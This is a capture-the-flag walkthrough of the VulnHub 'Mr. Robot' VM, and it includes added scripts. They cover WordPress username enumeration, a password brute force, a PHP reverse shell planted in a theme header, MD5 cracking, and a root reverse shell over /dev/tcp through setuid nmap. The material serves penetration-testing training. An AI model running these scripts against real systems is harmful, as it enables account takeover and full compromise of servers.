VulnHub (Mr. Robot)

Leo Pitt
6 min read · Mar 28, 2018


A bug is never just a mistake.

This VM is based on the show Mr. Robot. It has three keys hidden in different locations, and the goal is to find them all.

As always, we start with an nmap scan of the full port range.

nmap -sC -sV -v -p- -oA nmapAll 192.168.111.164

Based on the scan we identify two open ports, 80 and 443.

Browsing to robots.txt on port 80, we find the first key and a reference to a second file.

We download the second file; it appears to be a wordlist.

The same robots.txt is served on port 443.

Next, we run nikto against port 80.

Based on the directories it returns, WordPress is running on the machine.

There is nothing interesting on the WordPress blog itself.

We fire up wpscan, but it does not return anything interesting. It is also unable to enumerate users, most likely because the blog has no posts from which to pull author names.

After some research, it seems there is no reliable automated way to enumerate WordPress users when no posts have been published; the tools we looked at only become useful once valid usernames are known. So we tested usernames by hand against the login form, watching whether the error message changed: WordPress returns one error for an unknown username and a different one for a wrong password, and that difference confirms whether a user exists.

“admin” came back as an unknown username, as did other names from the show such as Tyrell and Darlene.

Elliot worked, returning the error that the password for that user is incorrect.
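The login-error oracle described above, as an added example that is not code from the original post. It matches the error strings WordPress 4.x (current when this was written) puts in the login page; newer releases word the unknown-username error differently, so check the strings against your target before trusting the classification. The target address, the dummy password and the candidate names are assumptions.

```shell
# Added example (not from the original post). Classifies a wp-login.php
# response as "no-such-user", "valid-user" or "unknown" from the WordPress 4.x
# error strings, then uses that to probe candidate usernames.
TARGET="http://192.168.111.164"   # assumed: the VM address from the nmap scan

# classify_login_response BODY -> prints no-such-user | valid-user | unknown
classify_login_response() {
    body="$1"
    if printf '%s' "$body" | grep -q 'Invalid username'; then
        echo "no-such-user"
    elif printf '%s' "$body" | grep -q 'is incorrect'; then
        echo "valid-user"
    else
        echo "unknown"      # unexpected page: lockout plugin, redirect, etc.
    fi
}

# probe_user NAME -> submits a dummy password and classifies the reply (needs the target)
probe_user() {
    name="$1"
    body=$(curl -s -k -X POST "$TARGET/wp-login.php" \
        --data-urlencode "log=$name" \
        --data-urlencode "pwd=not-the-password" \
        --data-urlencode "wp-submit=Log In")
    printf '%s %s\n' "$name" "$(classify_login_response "$body")"
}

# Constructed responses standing in for what the server returned during the manual test.
RESP_ADMIN='<div id="login_error"><strong>ERROR</strong>: Invalid username. <a href="/wp-login.php?action=lostpassword">Lost your password?</a><br /></div>'
RESP_ELLIOT='<div id="login_error"><strong>ERROR</strong>: The password you entered for the username <strong>elliot</strong> is incorrect. <a href="/wp-login.php?action=lostpassword">Lost your password?</a><br /></div>'
classify_login_response "$RESP_ADMIN"    # no-such-user
classify_login_response "$RESP_ELLIOT"   # valid-user

# Live use against the VM (uncomment on the attacking machine):
# for u in admin tyrell darlene elliot; do probe_user "$u"; done
```

Each probe is one failed login, so keep the candidate list short on a target with a lockout plugin; the "unknown" branch is there precisely so a lockout or redirect page is not misread as confirmation.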

With a valid username and a wordlist, we attempted to brute force the login. Skimming through the wordlist, we noticed a number of duplicate entries, so we stripped them out before feeding the list to an automated tool.

The deduplicated list is far smaller, which saves a lot of time on the brute force.

Running wpscan again with the wordlist and username flags, we find the password “ER28-0652” for the user “elliot”.
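The deduplication and brute-force steps above, as an added example that is not code from the original post. It uses awk rather than sort so the wordlist keeps its original order (a frequency-ordered list would otherwise be scrambled and the likely candidates pushed down the run). The file names, the target address and the wpscan 3.x flag spelling (-U/-P; older releases spelled these --username/--wordlist) are assumptions.

```shell
# Added example (not from the original post): deduplicate the downloaded
# wordlist, report the saving, and hand it to wpscan with the confirmed user.
TARGET="http://192.168.111.164"   # assumed VM address

# dedupe_wordlist IN OUT -> writes first occurrence of each line, prints "before after"
dedupe_wordlist() {
    in="$1"; out="$2"
    awk '!seen[$0]++' "$in" > "$out"          # order-preserving, unlike sort -u
    printf '%s %s\n' "$(wc -l < "$in" | tr -d ' ')" "$(wc -l < "$out" | tr -d ' ')"
}

# brute_force_login USER WORDLIST -> wpscan password attack (needs the target)
brute_force_login() {
    wpscan --url "$TARGET" --disable-tls-checks -U "$1" -P "$2"
}

# Constructed wordlist with repeats, standing in for the downloaded one.
tmpdir=$(mktemp -d)
printf '%s\n' password admin elliot ER28-0652 password 123456 admin ER28-0652 > "$tmpdir/words.dic"
dedupe_wordlist "$tmpdir/words.dic" "$tmpdir/words_unique.dic"   # prints: 8 5
# brute_force_login elliot "$tmpdir/words_unique.dic"
```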

Using the credentials, we log in successfully.

We navigate to Appearance > Editor and replace the contents of the Header Template (header.php) with pentestmonkey's php-reverse-shell, with its IP and port set to our attacking machine.

After setting up a listener on our attacking machine and browsing to the WordPress site again (any page that renders the theme header will do), we obtain a shell.
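Preparing the reverse shell for the theme editor, as an added example that is not code from the original post. The two lines it rewrites are the ones the stock pentestmonkey script marks with "CHANGE THIS"; the attacker address, listener port and file paths are assumptions.

```shell
# Added example (not from the original post): point pentestmonkey's
# php-reverse-shell at our listener, then trigger it by loading any page.
ATTACKER="192.168.111.100"   # assumed attacking-machine address
LPORT=4444                   # assumed listener port
TARGET="http://192.168.111.164"

# set_callback SRC DST -> copies the script with $ip/$port rewritten; prints
# the number of rewritten lines found in DST (2 when both took effect)
set_callback() {
    sed -e "s/^\\\$ip = '[^']*';/\$ip = '$ATTACKER';/" \
        -e "s/^\\\$port = [0-9]*;/\$port = $LPORT;/" "$1" > "$2"
    grep -c -e "'$ATTACKER';" -e "= $LPORT;" "$2"
}

# Constructed excerpt of the stock script's header, enough to show the rewrite.
tmpdir=$(mktemp -d)
cat > "$tmpdir/php-reverse-shell.php" <<'EOF'
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
EOF
set_callback "$tmpdir/php-reverse-shell.php" "$tmpdir/header.php"   # prints: 2

# Paste header.php into Appearance > Editor > header.php and save, then:
# nc -lvnp "$LPORT"                      # listener on the attacking machine
# curl -s -k "$TARGET/" > /dev/null      # in a second terminal: any page load runs the header
```

Because the shell is wired into the theme header, every visitor (and every crawler) triggers a fresh callback; restore the original header.php once the shell is in hand.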

We then view /etc/passwd and see an interesting user named robot.

We don't have permission to read the key in his home directory, but we can read a password file sitting next to it.

From the looks of it, the file holds an MD5 hash for the robot user: “c3fcd3d76192e4007dfb496cca67e13b”.

A quick search on hashes.org shows the plaintext is the lowercase alphabet:

“abcdefghijklmnopqrstuvwxyz”
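Checking the hash against a wordlist locally instead of an online lookup, as an added example that is not code from the original post. It treats the value as unsalted raw MD5, which is what an online lookup also assumes, and relies on GNU coreutils md5sum; the wordlist path and contents are constructed.

```shell
# Added example (not from the original post): offline check of the recovered
# hash against a wordlist. For anything bigger than a few thousand candidates
# use hashcat -m 0 instead; this loop is for a quick confirmation.
HASH="c3fcd3d76192e4007dfb496cca67e13b"   # the value read from robot's password file

# crack_md5 HASH WORDLIST -> prints the matching word and returns 0, or returns 1
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')   # normalise case before comparing
    while IFS= read -r word || [ -n "$word" ]; do  # also handles a missing final newline
        h=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)   # no trailing newline hashed
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed wordlist for the demonstration.
tmpdir=$(mktemp -d)
printf '%s\n' password robot mrrobot abcdefghijklmnopqrstuvwxyz fsociety > "$tmpdir/words.dic"
crack_md5 "$HASH" "$tmpdir/words.dic"   # abcdefghijklmnopqrstuvwxyz
```

The printf '%s' matters: echo would append a newline and every hash would come out wrong, which is a common reason a known-good wordlist appears to miss.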

Using su we switch to the robot user. Note that su needs a controlling terminal, so a bare reverse shell has to be upgraded to a pty first.

Now we have permission to read the second key.

Since we comfortably have access as robot, I wanted to experiment with another WordPress tool I had heard about recently before moving on to privilege escalation: WPForce, a WordPress attack suite by n00py. The suite has two components, wpforce and yertle, available at https://github.com/n00py/WPForce.

wpforce performs the same password brute force we did earlier with wpscan.

Next, I used the yertle component, which takes the recovered credentials and uploads a malicious plugin to get code execution.

After setting up a listener we get a shell.

The malicious plugin is visible in the Plugins tab of the WordPress admin, so this route is noisy by default; n00py's site covers the flags and methods that make the tool stealthier.

On to privilege escalation. We use the Linux enumeration script LinEnum from rebootuser, found at https://github.com/rebootuser/LinEnum. We always add the thorough-check flag “-t”; without it the script skips checks such as accessible SSH files, world-readable files in home directories, SUID files, SGID files and world-writable files.

Under the SUID section we find something interesting. When a binary with the setuid bit set is executed, it runs with the privileges of the file's owner (here root) rather than those of the user who launched it. If the setuid bit is set on a program that can spawn a shell (in this case nmap), we can abuse that to escalate our privileges.

And in case it wasn't obvious enough, LinEnum calls it out explicitly.

Older versions of nmap ship an interactive mode (--interactive), and there is a well-known trick for abusing it when the binary is setuid: anything run from inside interactive mode inherits nmap's root privileges.

Inside the interactive prompt, a command prefixed with “!” is handed to the shell.

With that we spawn a shell from the prompt and obtain root.

Note that the effective user id (euid) is root while the real uid is still robot. We can now read the last key.

We can abuse this setuid nmap in a number of ways.

We could simply run individual commands from interactive mode, prefixing each one with “!”.

Or we could send a reverse shell back to our machine with root rights.
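The SUID check and the nmap abuse above, as an added example that is not code from the original post. It reproduces the setuid search LinEnum -t performs, filters it against a short hand-picked list of shell-capable binaries, and shows both ways of using interactive mode. One caveat the post's euid note points at: bash resets its effective uid to the real uid on startup unless it is started with -p, so a reverse shell launched through bash without -p would come back as robot, not root. The attacker address, listener port and the sample SUID listing are assumptions.

```shell
# Added example (not from the original post): find setuid binaries that can
# spawn a shell, then use nmap's interactive mode to run commands as root.
ATTACKER="192.168.111.100"   # assumed attacking-machine address
LPORT=4445                   # assumed listener port

# list_suid -> every setuid-root candidate on the box (run on the target)
list_suid() {
    find / -perm -4000 -type f 2>/dev/null
}

# shell_capable_suid < PATHS -> keeps binaries known to hand out a shell
shell_capable_suid() {
    grep -E '/(nmap|vim|vi|find|bash|sh|less|more|awk|python[0-9.]*|perl)$'
}

# Manual session on the target (what the post did):
#   nmap --interactive
#   nmap> !sh
#   $ id        # shows euid=0(root) while uid is still robot

# root_shell_via_nmap -> same thing scripted: "!" runs the rest via /bin/sh as
# root; bash -p keeps the euid instead of dropping back to robot
root_shell_via_nmap() {
    nmap --interactive <<EOF
!bash -p -c 'bash -pi >& /dev/tcp/$ATTACKER/$LPORT 0>&1'
EOF
}

# Constructed listing standing in for the output of list_suid on the VM.
SAMPLE_SUID='/bin/ping
/bin/su
/usr/local/bin/nmap
/usr/bin/passwd
/usr/bin/sudo'
printf '%s\n' "$SAMPLE_SUID" | shell_capable_suid    # /usr/local/bin/nmap
# On the target: list_suid | shell_capable_suid
# then: nc -lvnp "$LPORT" on the attacker, root_shell_via_nmap on the target
```

The filter list is deliberately short; it is a prompt for manual review, not a substitute for it, since any setuid binary that reads or writes attacker-controlled paths is worth a look even if it never spawns a shell.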
